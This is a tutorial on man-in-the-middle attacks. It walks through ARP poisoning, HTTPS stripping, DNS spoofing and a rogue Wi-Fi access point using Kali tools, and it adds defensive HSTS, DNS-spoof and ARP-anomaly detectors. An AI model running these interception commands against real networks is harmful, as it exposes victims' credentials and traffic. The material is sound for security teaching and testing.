A Man-in-the-Middle (MITM) attack is a common network attack where an attacker secretly intercepts and possibly alters the communication between two parties. This type of attack allows the attacker to capture sensitive information such as login credentials, session cookies, or other private data.


In this comprehensive guide, we will cover MITM attacks, including setting up the environment, understanding attack methods, and practical examples for educational and penetration testing purposes. Remember, this guide is intended for learning how to secure and test your own systems; unauthorized testing is illegal.


### **Man-in-the-Middle Attack: Full Penetration Testing Guide**


### **1. Understanding Man-in-the-Middle Attacks**


#### **Types of MITM Attacks**

- **ARP Spoofing**: Sends forged ARP replies so that hosts on the LAN map the gateway's IP to the attacker's MAC address and route their traffic through the attacker's machine.

- **DNS Spoofing**: Manipulates DNS responses to redirect users to malicious websites.

- **HTTPS Stripping**: Downgrades HTTPS connections to HTTP so that otherwise encrypted data can be captured in the clear.

- **Wi-Fi Eavesdropping**: Uses a rogue Wi-Fi access point to intercept the traffic of clients that connect to it.

### **2. Setting Up the Environment**


**Tools Required:**

- **Kali Linux**: Preferred for its built-in penetration testing tools.

- **Wireshark**: A network protocol analyzer.

- **Ettercap**: A suite for MITM attacks on LAN.

- **Bettercap**: An advanced MITM tool that supports a wide range of attacks.


#### **Step 1: Install and Update Tools**

Make sure your Kali Linux system is up-to-date:

```bash
sudo apt-get update && sudo apt-get upgrade
```


Install Ettercap and Bettercap if not already installed:

```bash
sudo apt-get install ettercap-graphical bettercap
```


### **3. ARP Spoofing Attack with Ettercap**


**Objective**: Intercept and capture data between a victim device and a gateway.


#### **Step 1: Identify Network Interfaces and Targets**


1. **Identify Your Network Interface**:

   ```bash
   ifconfig
   ```
   Note your interface name, typically `eth0` for wired or `wlan0` for wireless. On recent Kali releases `ifconfig` may not be installed; `ip addr` shows the same information.


2. **Scan the Network**:

   Use tools like `netdiscover` or `nmap` to identify active devices on your network.

   ```bash
   sudo netdiscover -r 192.168.1.0/24
   ```

   Replace `192.168.1.0/24` with your network range.


#### **Step 2: Start ARP Spoofing**


1. **Launch Ettercap in Graphical Mode**:

   ```bash
   sudo ettercap -G
   ```


2. **Configure Ettercap**:

   - **Set Interface**: Select your network interface.

   - **Scan for Hosts**: Use “Hosts” -> “Scan for hosts” to identify devices on the network.

   - **Add Targets**: Add the victim’s IP as Target 1 and the router/gateway IP as Target 2.

   - **Start ARP Poisoning**: Go to “Mitm” -> “Arp poisoning”, check “Sniff remote connections,” and start.


3. **Sniff Data**:

   - Use the built-in Sniffer to monitor intercepted traffic.

   - You can also capture packets using Wireshark.


#### **Step 3: Analyze the Data**


1. **Use Wireshark to Analyze**:

   Capture traffic on your network interface:

   ```bash
   sudo wireshark
   ```

   Look for sensitive data like HTTP POST requests, unencrypted credentials, etc.


### **4. HTTPS Stripping with Bettercap**


**Objective**: Downgrade HTTPS to HTTP to capture unencrypted credentials.


#### **Step 1: Launch Bettercap**


1. **Start Bettercap**:

   ```bash
   sudo bettercap -iface wlan0
   ```

   Replace `wlan0` with your interface.


2. **Start ARP Spoofing**:

   ```bash
   net.probe on
   net.sniff on
   arp.spoof on
   ```


#### **Step 2: HTTPS Stripping**


1. **Activate HTTPS Stripping**:

   ```bash
   hstshijack/hstshijack
   ```
   This caplet rewrites HTTPS links to HTTP so that the client's traffic to the downgraded sites can be read in the clear. It is distributed with Bettercap's caplets collection rather than built into the binary, so the caplets must be installed before it can be loaded. It also has limits: a site the browser already knows from the HSTS preload list, or from an earlier visit that set the HSTS header, will refuse the plain-HTTP connection and cannot be downgraded this way.


2. **Monitor Credentials**:

   Captured credentials will appear in the Bettercap terminal.
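HSTS is the browser-side control that defeats the downgrade above: once a browser has cached a site's policy (or the site is on the preload list), it rewrites `http://` to `https://` itself, so the stripping proxy never sees a plaintext request to tamper with. The following parser and grader for the `Strict-Transport-Security` header is an added example, not code from this guide or from Bettercap; the one-year threshold is assumed from the preload submission requirements, and the sample header values are constructed.

```python
"""Parse and grade a Strict-Transport-Security (HSTS) response header.

Added example; not code from the original guide or from Bettercap.
HSTS is the browser-side defence against an HTTPS-to-HTTP downgrade:
once the policy is cached (or the site is preloaded), the browser never
issues the plain-HTTP request a stripping proxy would need to intercept.
The one-year threshold is the minimum max-age assumed for preload
submission.
"""
from dataclasses import dataclass
from typing import List, Optional

ONE_YEAR = 31_536_000  # seconds


@dataclass
class HstsPolicy:
    max_age: Optional[int]      # None when the directive is missing or malformed
    include_subdomains: bool
    preload: bool


def parse_hsts(header_value: str) -> HstsPolicy:
    """Parse the header value as RFC 6797 describes it: directives are
    separated by ';', names are case-insensitive, max-age may be quoted."""
    max_age = None
    include_subdomains = False
    preload = False
    for raw in header_value.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age" and value.isdigit():
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    return HstsPolicy(max_age, include_subdomains, preload)


def evaluate_hsts(header_value: Optional[str]) -> List[str]:
    """Return findings for a header value; an empty list means the policy
    is as strong as HSTS can make it. None means no header was sent."""
    if header_value is None:
        return ["no Strict-Transport-Security header: every visit is strippable"]
    policy = parse_hsts(header_value)
    if policy.max_age is None:
        # max-age is mandatory; without it browsers ignore the whole header
        return ["max-age missing or malformed: browsers ignore the header"]
    findings: List[str] = []
    if policy.max_age == 0:
        findings.append("max-age=0 deletes any cached policy: site is unprotected")
    elif policy.max_age < ONE_YEAR:
        findings.append(f"max-age={policy.max_age} is under one year: not preload-eligible")
    if not policy.include_subdomains:
        findings.append("includeSubDomains missing: subdomains can still be downgraded")
    if not policy.preload:
        findings.append("preload missing: the very first visit is still exposed")
    return findings


# Constructed sample header values (not captured from any real site).
SAMPLE_HEADERS = {
    "strong.example": "max-age=31536000; includeSubDomains; preload",
    "weak.example":   "max-age=300",
    "quoted.example": 'Max-Age="86400"; IncludeSubDomains',
    "none.example":   None,
}

if __name__ == "__main__":
    for host, value in SAMPLE_HEADERS.items():
        print(host, evaluate_hsts(value) or ["ok"])
```

Run against your own sites' responses, an empty finding list is the goal; anything else describes a window in which the downgrade still works (the first visit, a subdomain, or a policy that expires before the user returns).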


### **5. DNS Spoofing with Ettercap**


**Objective**: Redirect traffic from legitimate sites to malicious ones.


#### **Step 1: Configure DNS Spoofing**


1. **Edit the Ettercap DNS Spoof File**:

   ```bash
   sudo nano /etc/ettercap/etter.dns
   ```

   Add entries to redirect domains:

   ```
   example.com A 192.168.1.100
   *.example.com A 192.168.1.100
   ```

   Replace `192.168.1.100` with the IP address of your malicious server.


2. **Launch DNS Spoof Attack**:

   In Ettercap, enable DNS spoofing under “Plugins” -> “dns_spoof”.
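From the victim's side, the redirection configured in `etter.dns` has a recognisable shape: public names suddenly resolve to a LAN address, a wildcard entry collapses many names onto that one address, and the answers disagree with what a resolver outside the LAN returns. The detector below is an added example, not code from this guide or from Ettercap; the observed answers, the reference answers and the internal-zone suffixes it uses are all constructed for the demonstration.

```python
"""Spot DNS answers that look like LAN-side DNS spoofing.

Added example; not code from the original guide or from Ettercap.
Three checks run over observed (name, answer) pairs: a public name answered
with a LAN/loopback/link-local address, many names collapsing onto one
address, and disagreement with a reference resolver queried out of band.
The observed answers, reference answers and internal suffixes below are
constructed.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Addresses that should never be the answer for an Internet name.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                    # loopback, link-local
)]

# Zones that legitimately resolve to LAN addresses (split-horizon DNS); assumed.
INTERNAL_SUFFIXES = ("corp.example", "lan")


def is_internal_name(qname: str, suffixes: Iterable[str]) -> bool:
    q = qname.rstrip(".").lower()
    return any(q == s or q.endswith("." + s) for s in suffixes)


def is_non_routable(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in NON_ROUTABLE)


def detect_dns_spoofing(observed: List[Tuple[str, str]],
                        reference: Dict[str, Set[str]],
                        internal_suffixes: Iterable[str] = INTERNAL_SUFFIXES,
                        min_names: int = 3) -> List[str]:
    """Return human-readable alerts; an empty list means nothing suspicious."""
    alerts: List[str] = []
    # Check 1: public name -> non-routable address.
    for qname, ip in observed:
        if is_non_routable(ip) and not is_internal_name(qname, internal_suffixes):
            alerts.append(f"{qname} -> {ip}: public name answered with a LAN address")
    # Check 2: many names on one address. A wildcard entry produces exactly
    # this; CDNs do too, so the threshold is tunable and this is a lead, not proof.
    names_by_ip: Dict[str, Set[str]] = defaultdict(set)
    for qname, ip in observed:
        names_by_ip[ip].add(qname.lower())
    for ip, names in names_by_ip.items():
        if len(names) >= min_names:
            alerts.append(f"{ip} answers for {len(names)} names: {', '.join(sorted(names))}")
    # Check 3: the LAN resolver disagrees with a reference resolver.
    for qname, ip in observed:
        expected = reference.get(qname.lower())
        if expected is not None and ip not in expected:
            alerts.append(f"{qname}: got {ip}, reference resolver says {', '.join(sorted(expected))}")
    return alerts


# Constructed observed answers, as a client on the LAN would see them.
OBSERVED = [
    ("example.com", "192.168.1.100"),
    ("login.example.com", "192.168.1.100"),
    ("bank.example.net", "192.168.1.100"),
    ("intranet.corp.example", "10.0.0.5"),   # legitimate split-horizon answer
    ("www.example.org", "203.0.113.20"),     # TEST-NET-3, stands in for a public IP
]
# Constructed reference answers (as if obtained from a trusted resolver over DoH).
REFERENCE = {"example.com": {"203.0.113.10"}, "www.example.org": {"203.0.113.20"}}

if __name__ == "__main__":
    for alert in detect_dns_spoofing(OBSERVED, REFERENCE):
        print("ALERT:", alert)
```

The third check is the most reliable one, since it needs no assumptions about which addresses are "normal"; it only requires that the reference lookups travel a path the LAN attacker cannot alter, which is what DNS over HTTPS or TLS to a known resolver provides.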


### **6. Wi-Fi MITM with Rogue Access Points**


**Objective**: Set up a rogue AP to capture traffic.


1. **Start Airbase-ng**:

   ```bash
   sudo airbase-ng -e "FreeWiFi" -c 6 wlan0
   ```
   - `-e "FreeWiFi"` sets the SSID.

   - `-c 6` specifies the channel.

   - The interface must already be in monitor mode (put there with `airmon-ng`), so on most systems its name will be `wlan0mon` rather than `wlan0`.


2. **Set Up IP Forwarding**:

   ```bash
   # "sudo echo 1 > /proc/sys/net/ipv4/ip_forward" fails with "Permission denied":
   # the redirection is performed by the unprivileged shell, not by sudo.
   sudo sysctl -w net.ipv4.ip_forward=1
   ```


3. **Start DNS Spoofing with Bettercap**:

   Point Bettercap at the rogue AP's interface and use the same sniffing and spoofing modules as in section 4 to intercept and analyze the traffic of clients that connect to the AP.


### **7. Defending Against MITM Attacks**


1. **Use Encryption**: Always use HTTPS and secure protocols, and enable HSTS (with preload) so browsers refuse the plain-HTTP downgrade used in section 4.

2. **Use a VPN**: A VPN encrypts all traffic between the device and the VPN server, so an on-path attacker on the local network sees only ciphertext.

3. **Use Secure DNS**: Validate responses with DNSSEC and send queries over DNS over HTTPS or DNS over TLS to a trusted resolver such as Cloudflare DNS, so forged replies on the LAN are rejected or never reach the client.

4. **Avoid Untrusted Networks**: Don’t connect to open or untrusted Wi-Fi networks.

5. **Monitor ARP Tables**: Use tools like `arpwatch` to alert when the MAC address behind an IP, especially the gateway's, changes.
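What `arpwatch` reports for the poisoning in section 3 is simple to reproduce from the victim's own neighbour table: the gateway's IP suddenly maps to a different MAC, and that MAC also still answers for its own IP. The detector below is an added example (it is neither `arpwatch` nor code from this guide); it reads snapshots in the format printed by `ip neigh show` on Linux, and both snapshots it is run on are constructed.

```python
"""Flag ARP-cache changes that look like ARP poisoning.

Added example; this is not arpwatch and not code from the original guide.
It applies two of arpwatch's rules to successive snapshots of the local
neighbour table: an IP whose MAC changed between snapshots ("changed
ethernet address"), and one MAC that now answers for several IPs. Input
lines use the format printed by `ip neigh show`; both snapshots below are
constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List

# e.g. "192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)


def parse_neigh(output: str) -> Dict[str, str]:
    """Map IP -> lowercase MAC. Entries without lladdr (FAILED, INCOMPLETE)
    carry no address and are skipped."""
    table: Dict[str, str] = {}
    for line in output.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def detect_arp_anomalies(before: Dict[str, str], after: Dict[str, str],
                         gateway_ip: str) -> List[str]:
    """Compare two snapshots and return human-readable alerts."""
    alerts: List[str] = []
    # Rule 1: the MAC behind an IP changed. For the gateway this is the
    # strongest signal; for other hosts it can also be DHCP churn, so the
    # gateway is tagged explicitly.
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            tag = " (GATEWAY)" if ip == gateway_ip else ""
            alerts.append(f"{ip}{tag}: MAC changed {old} -> {mac}")
    # Rule 2: one MAC claims several IPs. A router that legitimately owns
    # two addresses on one interface also trips this, so treat it as a lead
    # to check rather than proof on its own.
    ips_by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in after.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


# Constructed snapshots: in the second one the gateway (.1) now resolves to
# the MAC of host .20, the textbook signature of ARP poisoning.
SNAPSHOT_BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev eth0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.30 dev eth0  FAILED
"""
SNAPSHOT_AFTER = """\
192.168.1.1 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.20 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.30 dev eth0  FAILED
"""

if __name__ == "__main__":
    for alert in detect_arp_anomalies(parse_neigh(SNAPSHOT_BEFORE),
                                      parse_neigh(SNAPSHOT_AFTER), "192.168.1.1"):
        print("ALERT:", alert)
```

In practice the snapshots come from running `ip neigh show` on a schedule (or from `arpwatch` itself); the gateway rule is the one worth paging on, the shared-MAC rule is what turns an alert into a named suspect.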


### **Conclusion**


This guide has covered setting up and executing various MITM attacks in a controlled environment. It’s crucial to emphasize the ethical and legal boundaries when conducting such tests. Always obtain explicit permission before testing networks, and use this knowledge to enhance security rather than exploit vulnerabilities. For professional growth, consider further certifications and training in cybersecurity, such as OSCP, CEH, or CompTIA PenTest+.
